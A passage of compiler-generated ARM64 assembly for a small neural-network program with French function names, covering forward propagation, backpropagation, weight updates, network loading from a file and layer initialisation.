ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
adrp x0, l_.str.77@PAGE
add x0, x0, l_.str.77@PAGEOFF
bl _printf
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
add x0, sp, #70
mov w1, #2
bl _fgets
str wzr, [sp, #64]
b LBB30_1
LBB30_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #64]
subs w8, w8, #10
cset w8, eq
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB30_3
b LBB30_2
LBB30_2: ; in Loop: Header=BB30_1 Depth=1
ldr w8, [sp, #64]
adds w8, w8, #1
cset w8, ne
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB30_3
LBB30_3: ; in Loop: Header=BB30_1 Depth=1
ldr w8, [sp, #36] ; 4-byte Folded Reload
tbz w8, #0, LBB30_5
b LBB30_4
LBB30_4: ; in Loop: Header=BB30_1 Depth=1
bl _getchar
str w0, [sp, #64]
b LBB30_1
LBB30_5:
ldrsb w8, [sp, #70]
subs w8, w8, #79
cset w8, eq
tbnz w8, #0, LBB30_7
b LBB30_6
LBB30_6:
ldrsb w8, [sp, #70]
subs w8, w8, #111
cset w8, ne
tbnz w8, #0, LBB30_12
b LBB30_7
LBB30_7:
adrp x0, l_.str.78@PAGE
add x0, x0, l_.str.78@PAGEOFF
bl _printf
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
add x0, sp, #88
str x0, [sp, #24] ; 8-byte Folded Spill
mov w1, #256
bl _fgets
ldr x0, [sp, #24] ; 8-byte Folded Reload
mov w1, #10
bl _strchr
mov x8, x0
str x8, [sp, #80]
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB30_9
b LBB30_8
LBB30_8:
ldr x8, [sp, #80]
strb wzr, [x8]
b LBB30_9
LBB30_9:
add x0, sp, #88
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
str x0, [sp, #72]
ldr x8, [sp, #72]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB30_11
b LBB30_10
LBB30_10:
adrp x0, l_.str.79@PAGE
add x0, x0, l_.str.79@PAGEOFF
bl _perror
mov w0, #1
bl _exit
LBB30_11:
bl _initNetwork
str x0, [sp, #56]
ldr x0, [sp, #56]
ldr x1, [sp, #72]
bl _loadNetwork
adrp x0, l_.str.80@PAGE
add x0, x0, l_.str.80@PAGEOFF
str x0, [sp, #16] ; 8-byte Folded Spill
bl _printf
ldr x8, [sp, #56]
ldr w9, [x8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.81@PAGE
add x0, x0, l_.str.81@PAGEOFF
bl _printf
ldr x0, [sp, #16] ; 8-byte Folded Reload
bl _printf
ldr x0, [sp, #56]
bl _statInfosBiais
ldr x0, [sp, #56]
bl _statInfosPoids
mov w0, #0
bl _exit
LBB30_12:
adrp x0, l_.str.82@PAGE
add x0, x0, l_.str.82@PAGEOFF
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
str x0, [sp, #48]
bl _initNetwork
str x0, [sp, #40]
ldr x0, [sp, #40]
ldr x1, [sp, #48]
bl _loadNetwork
adrp x0, l_.str.80@PAGE
add x0, x0, l_.str.80@PAGEOFF
str x0, [sp, #8] ; 8-byte Folded Spill
bl _printf
ldr x8, [sp, #40]
ldr w9, [x8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.81@PAGE
add x0, x0, l_.str.81@PAGEOFF
bl _printf
ldr x0, [sp, #8] ; 8-byte Folded Reload
bl _printf
ldr x0, [sp, #40]
bl _statInfosBiais
adrp x0, l_.str.83@PAGE
add x0, x0, l_.str.83@PAGEOFF
bl _printf
bl _getchar
ldr x0, [sp, #40]
bl _statInfosPoids
b LBB30_13
LBB30_13:
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB30_15
b LBB30_14
LBB30_14:
bl ___stack_chk_fail
LBB30_15:
ldp x29, x30, [sp, #368] ; 16-byte Folded Reload
ldp x28, x27, [sp, #352] ; 16-byte Folded Reload
add sp, sp, #384
ret
.cfi_endproc
; -- End function
.globl _propagation ; -- Begin function propagation
.p2align 2
_propagation: ; @propagation
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
movi d0, #0000000000000000
stur d0, [x29, #-24]
str d0, [sp, #32]
str wzr, [sp, #28]
; kill: def $x8 killed $xzr
str xzr, [sp, #16]
str wzr, [sp, #12]
b LBB31_1
LBB31_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldur x9, [x29, #-8]
ldr x9, [x9, #8]
ldr x9, [x9]
ldr w9, [x9, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB31_4
b LBB31_2
LBB31_2: ; in Loop: Header=BB31_1 Depth=1
ldur x8, [x29, #-16]
ldrsw x9, [sp, #12]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
ldr x8, [x8]
ldr x8, [x8]
ldrsw x9, [sp, #12]
str d0, [x8, x9, lsl #3]
b LBB31_3
LBB31_3: ; in Loop: Header=BB31_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB31_1
LBB31_4:
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
str x8, [sp, #16]
str wzr, [sp, #28]
b LBB31_5
LBB31_5: ; =>This Loop Header: Depth=1
; Child Loop BB31_7 Depth 2
; Child Loop BB31_9 Depth 3
; Child Loop BB31_16 Depth 2
ldr w8, [sp, #28]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB31_24
b LBB31_6
LBB31_6: ; in Loop: Header=BB31_5 Depth=1
str wzr, [sp, #8]
b LBB31_7
LBB31_7: ; Parent Loop BB31_5 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB31_9 Depth 3
ldr w8, [sp, #8]
ldr x9, [sp, #16]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB31_14
b LBB31_8
LBB31_8: ; in Loop: Header=BB31_7 Depth=2
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #8]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #8]
stur d0, [x29, #-24]
str wzr, [sp, #4]
b LBB31_9
LBB31_9: ; Parent Loop BB31_5 Depth=1
; Parent Loop BB31_7 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #4]
ldr x9, [sp, #16]
ldr x9, [x9]
ldr w9, [x9, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB31_12
b LBB31_10
LBB31_10: ; in Loop: Header=BB31_9 Depth=3
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8]
ldrsw x9, [sp, #4]
ldr d0, [x8, x9, lsl #3]
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #8]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #4]
ldr d1, [x8, x9, lsl #3]
ldur d2, [x29, #-24]
fmadd d0, d0, d1, d2
stur d0, [x29, #-24]
b LBB31_11
LBB31_11: ; in Loop: Header=BB31_9 Depth=3
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB31_9
LBB31_12: ; in Loop: Header=BB31_7 Depth=2
ldur d0, [x29, #-24]
fneg d0, d0
bl _exp
fmov d1, d0
fmov d0, #1.00000000
fadd d1, d0, d1
fdiv d0, d0, d1
str d0, [sp, #32]
ldr d0, [sp, #32]
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #8]
ldrsw x9, [sp, #8]
str d0, [x8, x9, lsl #3]
b LBB31_13
LBB31_13: ; in Loop: Header=BB31_7 Depth=2
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB31_7
LBB31_14: ; in Loop: Header=BB31_5 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB31_20
b LBB31_15
LBB31_15: ; in Loop: Header=BB31_5 Depth=1
str wzr, [sp]
b LBB31_16
LBB31_16: ; Parent Loop BB31_5 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp]
ldr x9, [sp, #16]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB31_19
b LBB31_17
LBB31_17: ; in Loop: Header=BB31_16 Depth=2
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #8]
ldrsw x9, [sp]
ldr d0, [x8, x9, lsl #3]
ldr x8, [sp, #16]
ldr x8, [x8, #8]
ldr x8, [x8]
ldr x8, [x8]
ldrsw x9, [sp]
str d0, [x8, x9, lsl #3]
b LBB31_18
LBB31_18: ; in Loop: Header=BB31_16 Depth=2
ldr w8, [sp]
add w8, w8, #1
str w8, [sp]
b LBB31_16
LBB31_19: ; in Loop: Header=BB31_5 Depth=1
b LBB31_20
LBB31_20: ; in Loop: Header=BB31_5 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB31_22
b LBB31_21
LBB31_21:
b LBB31_24
LBB31_22: ; in Loop: Header=BB31_5 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
str x8, [sp, #16]
b LBB31_23
LBB31_23: ; in Loop: Header=BB31_5 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB31_5
LBB31_24:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function apprentissageNetwork
lCPI32_0:
.quad 0x406fe00000000000 ; double 255
lCPI32_1:
.quad 0x3f847ae147ae147b ; double 0.01
.section __TEXT,__text,regular,pure_instructions
.globl _apprentissageNetwork
.p2align 2
_apprentissageNetwork: ; @apprentissageNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
ldrsw x0, [x8, #24]
mov x1, #8
bl _calloc
stur x0, [x29, #-24]
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
str x8, [sp, #32]
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
str x8, [sp, #24]
b LBB32_1
LBB32_1: ; =>This Loop Header: Depth=1
; Child Loop BB32_3 Depth 2
; Child Loop BB32_7 Depth 2
; Child Loop BB32_9 Depth 3
; Child Loop BB32_11 Depth 4
ldr x8, [sp, #32]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB32_18
b LBB32_2
LBB32_2: ; in Loop: Header=BB32_1 Depth=1
str wzr, [sp, #20]
b LBB32_3
LBB32_3: ; Parent Loop BB32_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #20]
ldur x9, [x29, #-16]
ldr x9, [x9, #8]
ldr w9, [x9, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB32_6
b LBB32_4
LBB32_4: ; in Loop: Header=BB32_3 Depth=2
ldr x8, [sp, #32]
ldr x8, [x8, #16]
ldrsw x9, [sp, #20]
ldr s1, [x8, x9, lsl #2]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
adrp x8, lCPI32_0@PAGE
ldr d1, [x8, lCPI32_0@PAGEOFF]
fdiv d0, d0, d1
ldur x8, [x29, #-24]
ldrsw x9, [sp, #20]
str d0, [x8, x9, lsl #3]
b LBB32_5
LBB32_5: ; in Loop: Header=BB32_3 Depth=2
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB32_3
LBB32_6: ; in Loop: Header=BB32_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-24]
bl _propagation
ldur x0, [x29, #-8]
ldr x1, [sp, #32]
bl _retropropagation
ldur x0, [x29, #-8]
bl _updateDw_And_Db
ldur x0, [x29, #-8]
adrp x8, lCPI32_1@PAGE
ldr d0, [x8, lCPI32_1@PAGEOFF]
bl _updateNetwork
b LBB32_7
LBB32_7: ; Parent Loop BB32_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB32_9 Depth 3
; Child Loop BB32_11 Depth 4
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB32_17
b LBB32_8
LBB32_8: ; in Loop: Header=BB32_7 Depth=2
str wzr, [sp, #16]
b LBB32_9
LBB32_9: ; Parent Loop BB32_1 Depth=1
; Parent Loop BB32_7 Depth=2
; => This Loop Header: Depth=3
; Child Loop BB32_11 Depth 4
ldr w8, [sp, #16]
ldr x9, [sp, #24]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB32_16
b LBB32_10
LBB32_10: ; in Loop: Header=BB32_9 Depth=3
ldr x8, [sp, #24]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #16]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
movi d0, #0000000000000000
str d0, [x8, #24]
ldr x8, [sp, #24]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #16]
mul x9, x9, x10
add x8, x8, x9
str d0, [x8, #32]
str wzr, [sp, #12]
b LBB32_11
LBB32_11: ; Parent Loop BB32_1 Depth=1
; Parent Loop BB32_7 Depth=2
; Parent Loop BB32_9 Depth=3
; => This Inner Loop Header: Depth=4
ldr w8, [sp, #12]
ldr x9, [sp, #24]
ldr x9, [x9]
ldr x9, [x9, #24]
ldrsw x10, [sp, #16]
mov x11, #48
mul x10, x10, x11
ldr w9, [x9, x10]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB32_14
b LBB32_12
LBB32_12: ; in Loop: Header=BB32_11 Depth=4
ldr x8, [sp, #24]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #16]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #40]
ldrsw x9, [sp, #12]
movi d0, #0000000000000000
str d0, [x8, x9, lsl #3]
b LBB32_13
LBB32_13: ; in Loop: Header=BB32_11 Depth=4
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB32_11
LBB32_14: ; in Loop: Header=BB32_9 Depth=3
b LBB32_15
LBB32_15: ; in Loop: Header=BB32_9 Depth=3
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB32_9
LBB32_16: ; in Loop: Header=BB32_7 Depth=2
ldr x8, [sp, #24]
ldr x8, [x8, #8]
str x8, [sp, #24]
b LBB32_7
LBB32_17: ; in Loop: Header=BB32_1 Depth=1
ldr x8, [sp, #32]
ldr x8, [x8, #32]
str x8, [sp, #32]
b LBB32_1
LBB32_18:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _retropropagation ; -- Begin function retropropagation
.p2align 2
_retropropagation: ; @retropropagation
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #56]
str x1, [sp, #48]
ldr x8, [sp, #56]
ldr x8, [x8, #16]
str x8, [sp, #40]
ldr x8, [sp, #40]
ldr x8, [x8]
str x8, [sp, #32]
; kill: def $x8 killed $xzr
str xzr, [sp, #24]
movi d0, #0000000000000000
str d0, [sp, #16]
str wzr, [sp, #12]
b LBB33_1
LBB33_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldr x9, [sp, #32]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB33_4
b LBB33_2
LBB33_2: ; in Loop: Header=BB33_1 Depth=1
ldr x8, [sp, #32]
ldr x8, [x8, #8]
ldrsw x9, [sp, #12]
ldr d0, [x8, x9, lsl #3]
ldr x8, [sp, #48]
ldr w8, [x8, #12]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, eq
and w8, w8, #0x1
scvtf d1, w8
fsub d0, d0, d1
ldr x8, [sp, #32]
ldr x8, [x8, #8]
ldrsw x9, [sp, #12]
ldr d1, [x8, x9, lsl #3]
fmul d0, d0, d1
ldr x8, [sp, #32]
ldr x8, [x8, #8]
ldrsw x9, [sp, #12]
ldr d2, [x8, x9, lsl #3]
fmov d1, #1.00000000
fsub d1, d1, d2
fmul d0, d0, d1
ldr x8, [sp, #32]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
str d0, [x8, #24]
b LBB33_3
LBB33_3: ; in Loop: Header=BB33_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB33_1
LBB33_4:
b LBB33_5
LBB33_5: ; =>This Loop Header: Depth=1
; Child Loop BB33_6 Depth 2
; Child Loop BB33_8 Depth 3
ldr x8, [sp, #40]
ldr x8, [x8, #16]
str x8, [sp, #40]
ldr x8, [sp, #40]
ldr x8, [x8]
str x8, [sp, #32]
ldr x8, [sp, #40]
ldr x8, [x8, #8]
ldr x8, [x8]
str x8, [sp, #24]
str wzr, [sp, #8]
b LBB33_6
LBB33_6: ; Parent Loop BB33_5 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB33_8 Depth 3
ldr w8, [sp, #8]
ldr x9, [sp, #32]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB33_13
b LBB33_7
LBB33_7: ; in Loop: Header=BB33_6 Depth=2
movi d0, #0000000000000000
str d0, [sp, #16]
str wzr, [sp, #4]
b LBB33_8
LBB33_8: ; Parent Loop BB33_5 Depth=1
; Parent Loop BB33_6 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #4]
ldr x9, [sp, #24]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB33_11
b LBB33_9
LBB33_9: ; in Loop: Header=BB33_8 Depth=3
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldrsw x9, [sp, #4]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #24]
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldrsw x9, [sp, #4]
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #8]
ldr d1, [x8, x9, lsl #3]
ldr d2, [sp, #16]
fmadd d0, d0, d1, d2
str d0, [sp, #16]
b LBB33_10
LBB33_10: ; in Loop: Header=BB33_8 Depth=3
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB33_8
LBB33_11: ; in Loop: Header=BB33_6 Depth=2
ldr d0, [sp, #16]
ldr x8, [sp, #32]
ldr x8, [x8, #8]
ldrsw x9, [sp, #8]
ldr d1, [x8, x9, lsl #3]
fmul d0, d0, d1
ldr x8, [sp, #32]
ldr x8, [x8, #8]
ldrsw x9, [sp, #8]
ldr d2, [x8, x9, lsl #3]
fmov d1, #1.00000000
fsub d1, d1, d2
fmul d0, d0, d1
ldr x8, [sp, #32]
ldr x8, [x8, #24]
ldrsw x9, [sp, #8]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
str d0, [x8, #24]
b LBB33_12
LBB33_12: ; in Loop: Header=BB33_6 Depth=2
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB33_6
LBB33_13: ; in Loop: Header=BB33_5 Depth=1
b LBB33_14
LBB33_14: ; in Loop: Header=BB33_5 Depth=1
ldr x8, [sp, #40]
ldr x8, [x8, #16]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB33_5
b LBB33_15
LBB33_15:
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _updateDw_And_Db ; -- Begin function updateDw_And_Db
.p2align 2
_updateDw_And_Db: ; @updateDw_And_Db
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
ldr x8, [sp, #24]
ldr x8, [x8, #8]
str x8, [sp, #16]
b LBB34_1
LBB34_1: ; =>This Loop Header: Depth=1
; Child Loop BB34_3 Depth 2
; Child Loop BB34_5 Depth 3
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB34_11
b LBB34_2
LBB34_2: ; in Loop: Header=BB34_1 Depth=1
str wzr, [sp, #12]
b LBB34_3
LBB34_3: ; Parent Loop BB34_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB34_5 Depth 3
ldr w8, [sp, #12]
ldr x9, [sp, #16]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB34_10
b LBB34_4
LBB34_4: ; in Loop: Header=BB34_3 Depth=2
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d1, [x8, #24]
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #32]
fadd d0, d0, d1
str d0, [x8, #32]
str wzr, [sp, #8]
b LBB34_5
LBB34_5: ; Parent Loop BB34_1 Depth=1
; Parent Loop BB34_3 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #8]
ldr x9, [sp, #16]
ldr x9, [x9]
ldr x9, [x9, #24]
ldrsw x10, [sp, #12]
mov x11, #48
mul x10, x10, x11
ldr w9, [x9, x10]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB34_8
b LBB34_6
LBB34_6: ; in Loop: Header=BB34_5 Depth=3
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #24]
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8]
ldrsw x9, [sp, #8]
ldr d1, [x8, x9, lsl #3]
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #40]
ldrsw x9, [sp, #8]
add x8, x8, x9, lsl #3
ldr d2, [x8]
fmadd d0, d0, d1, d2
str d0, [x8]
b LBB34_7
LBB34_7: ; in Loop: Header=BB34_5 Depth=3
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB34_5
LBB34_8: ; in Loop: Header=BB34_3 Depth=2
b LBB34_9
LBB34_9: ; in Loop: Header=BB34_3 Depth=2
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB34_3
LBB34_10: ; in Loop: Header=BB34_1 Depth=1
ldr x8, [sp, #16]
ldr x8, [x8, #8]
str x8, [sp, #16]
b LBB34_1
LBB34_11:
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _updateNetwork ; -- Begin function updateNetwork
.p2align 2
_updateNetwork: ; @updateNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #40]
str d0, [sp, #32]
ldr x8, [sp, #40]
ldr x8, [x8, #8]
str x8, [sp, #24]
movi d0, #0000000000000000
str d0, [sp, #16]
b LBB35_1
LBB35_1: ; =>This Loop Header: Depth=1
; Child Loop BB35_3 Depth 2
; Child Loop BB35_5 Depth 3
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB35_11
b LBB35_2
LBB35_2: ; in Loop: Header=BB35_1 Depth=1
str wzr, [sp, #12]
b LBB35_3
LBB35_3: ; Parent Loop BB35_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB35_5 Depth 3
ldr w8, [sp, #12]
ldr x9, [sp, #24]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB35_10
b LBB35_4
LBB35_4: ; in Loop: Header=BB35_3 Depth=2
ldr d0, [sp, #32]
ldr x8, [sp, #24]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d1, [x8, #32]
ldr x8, [sp, #24]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mul x9, x9, x10
add x8, x8, x9
ldr d2, [x8, #8]
fmsub d0, d0, d1, d2
str d0, [x8, #8]
str wzr, [sp, #8]
b LBB35_5
LBB35_5: ; Parent Loop BB35_1 Depth=1
; Parent Loop BB35_3 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #8]
ldr x9, [sp, #24]
ldr x9, [x9]
ldr x9, [x9, #24]
ldrsw x10, [sp, #12]
mov x11, #48
mul x10, x10, x11
ldr w9, [x9, x10]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB35_8
b LBB35_6
LBB35_6: ; in Loop: Header=BB35_5 Depth=3
ldr d0, [sp, #32]
ldr x8, [sp, #24]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #40]
ldrsw x9, [sp, #8]
ldr d1, [x8, x9, lsl #3]
fmul d0, d0, d1
str d0, [sp, #16]
ldr x8, [sp, #24]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #8]
ldr d0, [x8, x9, lsl #3]
ldr d1, [sp, #16]
fsub d0, d0, d1
ldr x8, [sp, #24]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #12]
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #8]
str d0, [x8, x9, lsl #3]
b LBB35_7
LBB35_7: ; in Loop: Header=BB35_5 Depth=3
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB35_5
LBB35_8: ; in Loop: Header=BB35_3 Depth=2
b LBB35_9
LBB35_9: ; in Loop: Header=BB35_3 Depth=2
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB35_3
LBB35_10: ; in Loop: Header=BB35_1 Depth=1
ldr x8, [sp, #24]
ldr x8, [x8, #8]
str x8, [sp, #24]
b LBB35_1
LBB35_11:
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _initLayers ; -- Begin function initLayers
.p2align 2
_initLayers: ; @initLayers
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur w1, [x29, #-8]
mov x0, #1
mov x1, #32
bl _calloc
stur x0, [x29, #-16]
ldur w8, [x29, #-4]
ldur x9, [x29, #-16]
str w8, [x9, #16]
ldur w8, [x29, #-8]
ldur x9, [x29, #-16]
str w8, [x9, #20]
ldursw x0, [x29, #-8]
mov x1, #48
bl _calloc
ldur x8, [x29, #-16]
str x0, [x8, #24]
ldursw x0, [x29, #-4]
mov x1, #8
str x1, [sp, #16] ; 8-byte Folded Spill
bl _calloc
ldr x1, [sp, #16] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
str x0, [x8]
ldursw x0, [x29, #-8]
bl _calloc
ldur x8, [x29, #-16]
str x0, [x8, #8]
stur wzr, [x29, #-20]
b LBB36_1
LBB36_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-20]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB36_4
b LBB36_2
LBB36_2: ; in Loop: Header=BB36_1 Depth=1
ldursw x0, [x29, #-4]
mov x1, #8
str x1, [sp] ; 8-byte Folded Spill
bl _calloc
ldr x1, [sp] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
ldursw x9, [x29, #-20]
mov x10, #48
str x10, [sp, #8] ; 8-byte Folded Spill
mul x9, x9, x10
add x8, x8, x9
str x0, [x8, #40]
ldursw x0, [x29, #-4]
bl _calloc
ldr x11, [sp, #8] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
ldursw x9, [x29, #-20]
mul x9, x9, x11
add x8, x8, x9
str x0, [x8, #16]
ldur w8, [x29, #-4]
ldur x9, [x29, #-16]
ldr x9, [x9, #24]
